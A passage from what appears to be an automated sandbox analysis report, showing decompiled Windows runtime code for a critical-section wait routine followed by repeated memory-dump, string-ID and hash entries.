                                                        				signed char* _t64;
                                                        				signed int _t67;
                                                        				signed int _t72;
                                                        				signed int _t77;
                                                        				signed int _t78;
                                                        				signed int _t88;
                                                        				intOrPtr _t89;
                                                        				signed char _t93;
                                                        				signed int _t97;
                                                        				signed int _t98;
                                                        				signed int _t102;
                                                        				signed int _t103;
                                                        				intOrPtr _t104;
                                                        				signed int _t105;
                                                        				signed int _t106;
                                                        				signed char _t109;
                                                        				signed int _t111;
                                                        				void* _t116;
                                                        
                                                        				_t102 = __edi;
                                                        				_t97 = __edx;
                                                        				_v12 = _v12 & 0x00000000;
                                                        				_t55 =  *[fs:0x18];
                                                        				_t109 = __ecx;
                                                        				_v8 = __edx;
                                                        				_t86 = 0;
                                                        				_v32 = _t55;
                                                        				_v24 = 0;
                                                        				_push(__edi);
                                                        				if(__ecx == 0x18d5350) {
                                                        					_t86 = 1;
                                                        					_v24 = 1;
                                                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                        				}
                                                        				_t103 = _t102 | 0xffffffff;
                                                        				if( *0x18d7bc8 != 0) {
                                                        					_push(0xc000004b);
                                                        					_push(_t103);
                                                        					E018297C0();
                                                        				}
                                                        				if( *0x18d79c4 != 0) {
                                                        					_t57 = 0;
                                                        				} else {
                                                        					_t57 = 0x18d79c8;
                                                        				}
                                                        				_v16 = _t57;
                                                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                        					_t93 = _t109;
                                                        					L23();
                                                        				}
                                                        				_t58 =  *_t109;
                                                        				if(_t58 == _t103) {
                                                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                        					_t58 = _t103;
                                                        					if(__eflags == 0) {
                                                        						_t93 = _t109;
                                                        						E01811624(_t86, __eflags);
                                                        						_t58 =  *_t109;
                                                        					}
                                                        				}
                                                        				_v20 = _v20 & 0x00000000;
                                                        				if(_t58 != _t103) {
                                                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                        				}
                                                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                        				_t88 = _v16;
                                                        				_v28 = _t104;
                                                        				L9:
                                                        				while(1) {
                                                        					if(E01807D50() != 0) {
                                                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                        					} else {
                                                        						_t62 = 0x7ffe0382;
                                                        					}
                                                        					if( *_t62 != 0) {
                                                        						_t63 =  *[fs:0x30];
                                                        						__eflags = _t63[0x240] & 0x00000002;
                                                        						if((_t63[0x240] & 0x00000002) != 0) {
                                                        							_t93 = _t109;
                                                        							E0187FE87(_t93);
                                                        						}
                                                        					}
                                                        					if(_t104 != 0xffffffff) {
                                                        						_push(_t88);
                                                        						_push(0);
                                                        						_push(_t104);
                                                        						_t64 = E01829520();
                                                        						goto L15;
                                                        					} else {
                                                        						while(1) {
                                                        							_t97 =  &_v8;
                                                        							_t64 = E0181E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                        							if(_t64 == 0x102) {
                                                        								break;
                                                        							}
                                                        							_t93 =  *(_t109 + 4);
                                                        							_v8 = _t93;
                                                        							if((_t93 & 0x00000002) != 0) {
                                                        								continue;
                                                        							}
                                                        							L15:
                                                        							if(_t64 == 0x102) {
                                                        								break;
                                                        							}
                                                        							_t89 = _v24;
                                                        							if(_t64 < 0) {
                                                        								L0183DF30(_t93, _t97, _t64);
                                                        								_push(_t93);
                                                        								_t98 = _t97 | 0xffffffff;
                                                        								__eflags =  *0x18d6901;
                                                        								_push(_t109);
                                                        								_v52 = _t98;
                                                        								if( *0x18d6901 != 0) {
                                                        									_push(0);
                                                        									_push(1);
                                                        									_push(0);
                                                        									_push(0x100003);
                                                        									_push( &_v12);
                                                        									_t72 = E01829980();
                                                        									__eflags = _t72;
                                                        									if(_t72 < 0) {
                                                        										_v12 = _t98 | 0xffffffff;
                                                        									}
                                                        								}
                                                        								asm("lock cmpxchg [ecx], edx");
                                                        								_t111 = 0;
                                                        								__eflags = 0;
                                                        								if(0 != 0) {
                                                        									__eflags = _v12 - 0xffffffff;
                                                        									if(_v12 != 0xffffffff) {
                                                        										_push(_v12);
                                                        										E018295D0();
                                                        									}
                                                        								} else {
                                                        									_t111 = _v12;
                                                        								}
                                                        								return _t111;
                                                        							} else {
                                                        								if(_t89 != 0) {
                                                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                        									_t77 = E01807D50();
                                                        									__eflags = _t77;
                                                        									if(_t77 == 0) {
                                                        										_t64 = 0x7ffe0384;
                                                        									} else {
                                                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                        									}
                                                        									__eflags =  *_t64;
                                                        									if( *_t64 != 0) {
                                                        										_t64 =  *[fs:0x30];
                                                        										__eflags = _t64[0x240] & 0x00000004;
                                                        										if((_t64[0x240] & 0x00000004) != 0) {
                                                        											_t78 = E01807D50();
                                                        											__eflags = _t78;
                                                        											if(_t78 == 0) {
                                                        												_t64 = 0x7ffe0385;
                                                        											} else {
                                                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                        											}
                                                        											__eflags =  *_t64 & 0x00000020;
                                                        											if(( *_t64 & 0x00000020) != 0) {
                                                        												_t64 = E01867016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        								return _t64;
                                                        							}
                                                        						}
                                                        						_t97 = _t88;
                                                        						_t93 = _t109;
                                                        						E0187FDDA(_t97, _v12);
                                                        						_t105 =  *_t109;
                                                        						_t67 = _v12 + 1;
                                                        						_v12 = _t67;
                                                        						__eflags = _t105 - 0xffffffff;
                                                        						if(_t105 == 0xffffffff) {
                                                        							_t106 = 0;
                                                        							__eflags = 0;
                                                        						} else {
                                                        							_t106 =  *(_t105 + 0x14);
                                                        						}
                                                        						__eflags = _t67 - 2;
                                                        						if(_t67 > 2) {
                                                        							__eflags = _t109 - 0x18d5350;
                                                        							if(_t109 != 0x18d5350) {
                                                        								__eflags = _t106 - _v20;
                                                        								if(__eflags == 0) {
                                                        									_t93 = _t109;
                                                        									E0187FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                        								}
                                                        							}
                                                        						}
                                                        						_push("RTL: Re-Waiting\n");
                                                        						_push(0);
                                                        						_push(0x65);
                                                        						_v20 = _t106;
                                                        						E01875720();
                                                        						_t104 = _v28;
                                                        						_t116 = _t116 + 0xc;
                                                        						continue;
                                                        					}
                                                        				}
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Re-Waiting
                                                        • API String ID: 0-316354757
                                                        • Opcode ID: d5fd0e368c9082ce290e0c04d771e75d8d20507113923da59f624be1c9fda698
                                                        • Instruction ID: 404e14d79113ab24fadc0aff83187c4aae7cd00d8111e8881aadd16e1d676368
                                                        • Opcode Fuzzy Hash: d5fd0e368c9082ce290e0c04d771e75d8d20507113923da59f624be1c9fda698
                                                        • Instruction Fuzzy Hash: B0612931E006559FDB32DB6CC848B7EBBE8EB88718F180599DA11D72C2C7749A4187D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018140E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                        • API String ID: 0-996340685
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WindowsExcludedProcs
                                                        • API String ID: 0-3583428290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • Critical error detected %lx, xrefs: 01898E21
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Critical error detected %lx
                                                        • API String ID: 0-802127002
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b70c8bf6df693b2789b042ff565fefe926ab4bc65a1baa36186ed91002bc15e8
                                                        • Instruction ID: 21993ca55d20116478108aebe9f21e7f06e2d00d664fcff6f3b220144b677af5
                                                        • Opcode Fuzzy Hash: b70c8bf6df693b2789b042ff565fefe926ab4bc65a1baa36186ed91002bc15e8
                                                        • Instruction Fuzzy Hash: 84710F32A042568FD352DF28C884B2AF7E4FF84714F058569EC99CB392D734DA41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8ddb3c81b2f044c3ec7f4f049615dacd293d842514d6e2274d800cb5a00dbc6
                                                        • Instruction ID: ef5f6eff502b5b164f2669682544046c4cb548fcb8aefa339d05e6a7d58e1c11
                                                        • Opcode Fuzzy Hash: c8ddb3c81b2f044c3ec7f4f049615dacd293d842514d6e2274d800cb5a00dbc6
                                                        • Instruction Fuzzy Hash: 3171F032200706AFE732EF18CC44F66BBE6EF44724F144528E665D72A1EB71EA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction ID: 08aadea4f27823ffd770dee422e8175c119ae13c98cb33b91f02e09956eab777
                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction Fuzzy Hash: 38717F71E00659EFDB11DFA8C984EEEBBB9FF48714F104069E505E7290EB34AA41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eee43d28341189f3a8e067d164f00360e53864fb18aa0422d27b03f0af2ddf62
                                                        • Instruction ID: cb73985a7bade6452bf77bccdda4db7d2c90485578659bff1ee860db3693515d
                                                        • Opcode Fuzzy Hash: eee43d28341189f3a8e067d164f00360e53864fb18aa0422d27b03f0af2ddf62
                                                        • Instruction Fuzzy Hash: D261E036A052158BCB26CF5CC48067FBBB1EF85710B1880ADEA55DB385DF34DA42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc7c2e867ad0a8b28e6b0373f3d63b0a935ae8c0982cc186f36449126e290372
                                                        • Instruction ID: 022eeb675c2f41b6afc0dbb55d10b1a4b12c15b24b7bc9a7778016e58e95c955
                                                        • Opcode Fuzzy Hash: fc7c2e867ad0a8b28e6b0373f3d63b0a935ae8c0982cc186f36449126e290372
                                                        • Instruction Fuzzy Hash: 39519F71A007069FDB31DF59C888A6BF7E9BF59309F00442DE24687651DB74EA84CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9922d02bdf8b7221ba9dbc3ea8eec8afdc7674d0a800f0334204b25bc76be91d
                                                        • Instruction ID: 2bd3068e35a56690fd166ea663c4b08b20ecaf2d5a854227d3d63c888c61beeb
                                                        • Opcode Fuzzy Hash: 9922d02bdf8b7221ba9dbc3ea8eec8afdc7674d0a800f0334204b25bc76be91d
                                                        • Instruction Fuzzy Hash: 8751D275D0025D8FEB31CF688845BAEBFB0BF04714F1041A9D859EB292DB744A41DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58ddb407461cc8f450d08b9fe79c7812ee263728b9d65bb9b2bf18c24495276c
                                                        • Instruction ID: 4287a3d25e553687b8c42b2aceb447e70c90f4fbea890e5149688ce17dceb047
                                                        • Opcode Fuzzy Hash: 58ddb407461cc8f450d08b9fe79c7812ee263728b9d65bb9b2bf18c24495276c
                                                        • Instruction Fuzzy Hash: F851CF72E0060ADFDB16DF68C8547AEBBB8FF54318F00452AD412D7294DB74AA14CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da5863647adb7593146b4bead9aafbcdbae94dcb2f7f849481b1b5248a7bfd01
                                                        • Instruction ID: 7910e8d9a4802015358a2163472929b34177914134ba00d3a9119118c157755a
                                                        • Opcode Fuzzy Hash: da5863647adb7593146b4bead9aafbcdbae94dcb2f7f849481b1b5248a7bfd01
                                                        • Instruction Fuzzy Hash: 9751F5316047868BF315DF2CC594B6ABBE0FF50314F584569E985CB291EB74EA05CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a69cf8dceddd923727ab27d02a74b81fbc2092a9c86e4c760e8c5f6e5045be8
                                                        • Instruction ID: 3aa43c44bdf297a07fe5d5bee21ae9c9dca322149ed14dc332ebec751c663836
                                                        • Opcode Fuzzy Hash: 5a69cf8dceddd923727ab27d02a74b81fbc2092a9c86e4c760e8c5f6e5045be8
                                                        • Instruction Fuzzy Hash: EF51AD7120934AABD322DF28C844B27BBE8FF54718F14091EF595C7651EB74EA44CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e688a64eb12930a0ca5bc403b6d488face7e3f11e6d32af40162f7f9afd4aae
                                                        • Instruction ID: eefe7e38b0565bf17179647d52833cec4a20e8577b1122f9d79dc816baee755d
                                                        • Opcode Fuzzy Hash: 5e688a64eb12930a0ca5bc403b6d488face7e3f11e6d32af40162f7f9afd4aae
                                                        • Instruction Fuzzy Hash: 785190B7A00129CFCB18CF1CC4909BDB7B6FB88704725845AE846DB369E734AB51DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 363b33fbe704313a7ff304a4834fecbcfd4720c9213d8a3c5ecb4e333f1e5033
                                                        • Instruction ID: e5cac15940181757908f9eb0c5a96c6cdf982f3d51c4f27801b3756e1bdcda54
                                                        • Opcode Fuzzy Hash: 363b33fbe704313a7ff304a4834fecbcfd4720c9213d8a3c5ecb4e333f1e5033
                                                        • Instruction Fuzzy Hash: 72516D726083419FD741DF29C884A6ABBEDFF84364F144929FC99C7285E770EA05CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a91e428be89bbd34b628a66105a47fe688700d7c6aaa89a8a6c721cf50243345
                                                        • Instruction ID: 2c5c094d55bc763bf1014445bac3c9cc4672a303d794c4000cc4719fadf78bb6
                                                        • Opcode Fuzzy Hash: a91e428be89bbd34b628a66105a47fe688700d7c6aaa89a8a6c721cf50243345
                                                        • Instruction Fuzzy Hash: 37518175A01609DFCB56CFECC88069EFBF1BB49350F24825AD955E7384DB30AA44CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction ID: df1484f28be30bf56ff52b7ba7fe9ffc5db10747f2145390c0bba1242f5c5fec
                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction Fuzzy Hash: 1A51F032A04249AFEB25CB6CC0C47AFFBF1AF05314F1881ACC64597382CB75AA89C751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction ID: 853227f2663b259552179536a9aa687a712a3a388eeca1f771fd202fef76a9ed
                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction Fuzzy Hash: 94518F71500646DFDB16CF18C980A96BBB5FF85304F15C1AAE908DF292E371EA45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57c987ef142df1584dd8d639fa8fc84791a5094b44c6db83ae1c023477dd8020
                                                        • Instruction ID: a2cb8bb0f1afe30c2dd8a7c4b63bc6a368ad8fc2a3aa82fdeb0ce40fb780c581
                                                        • Opcode Fuzzy Hash: 57c987ef142df1584dd8d639fa8fc84791a5094b44c6db83ae1c023477dd8020
                                                        • Instruction Fuzzy Hash: EA516B79A00629DFDB16CF88C480AADF7B1FF84724F2445A9D915E7351D730AE81CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 467873e7ac80bfe126b994aa3491bab7a969bde41f1b8eb4726ed3fd4d41a68c
                                                        • Instruction ID: 72ccf107efdae15895e4668300c1b9a45e79aa81da83d96beab737b16d2070a4
                                                        • Opcode Fuzzy Hash: 467873e7ac80bfe126b994aa3491bab7a969bde41f1b8eb4726ed3fd4d41a68c
                                                        • Instruction Fuzzy Hash: 4E515972A0020ADFDF25DF59C880EDEBBBAFF48354F248155E911AB224C7359E52CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af91ce5c7371849fe420cf7085767300f4acf34dfef94c12891c613c247e830d
                                                        • Instruction ID: fbadffcb8bb3f63e56bf8ebd28ed5bb29afaf11de64129b526ba4bb7ae934194
                                                        • Opcode Fuzzy Hash: af91ce5c7371849fe420cf7085767300f4acf34dfef94c12891c613c247e830d
                                                        • Instruction Fuzzy Hash: 2741E43660431A9BC321EF2CCC80B67BBE4AF58714F100929FA95CB291DA30DE41C7DA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af80446f3e713b5cbabdd452dd73ab96df6cbba42a4bb548fe7506388579f9a6
                                                        • Instruction ID: 6e38f4666e4648adf06017bcce6b5c98edba983d940e54f4af310372cd7765df
                                                        • Opcode Fuzzy Hash: af80446f3e713b5cbabdd452dd73ab96df6cbba42a4bb548fe7506388579f9a6
                                                        • Instruction Fuzzy Hash: AA41B236A0022D9BDB71DF68C944BEAB7F8EF45740F4101A5E908EB245EB749F84CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24281f9caf9ac99c5d4c9883d70a21847a158cd831a776d48fcba25d078b9843
                                                        • Instruction ID: 3d65eb6bcc34bb14ea1837e9889c9f141355e76abe1c1e15c2e691a6bf8aea2a
                                                        • Opcode Fuzzy Hash: 24281f9caf9ac99c5d4c9883d70a21847a158cd831a776d48fcba25d078b9843
                                                        • Instruction Fuzzy Hash: 3441E572A403189FEB32DF18CC80F6AB7A9EB45724F140099E945DB285D774EF84CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ae756c7a0d671bcdaea9ae2f7fccce295e8f6f77583c4e38da6a004bbb3e452
                                                        • Instruction ID: 5ee35879b182f8e118bc633959eba3c6133437c96c369384d90440d63d2ad163
                                                        • Opcode Fuzzy Hash: 9ae756c7a0d671bcdaea9ae2f7fccce295e8f6f77583c4e38da6a004bbb3e452
                                                        • Instruction Fuzzy Hash: DC41B271A0030EAFEBB29FACCC44BADBBB5BF59714F144119E640E7291D7749B408B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
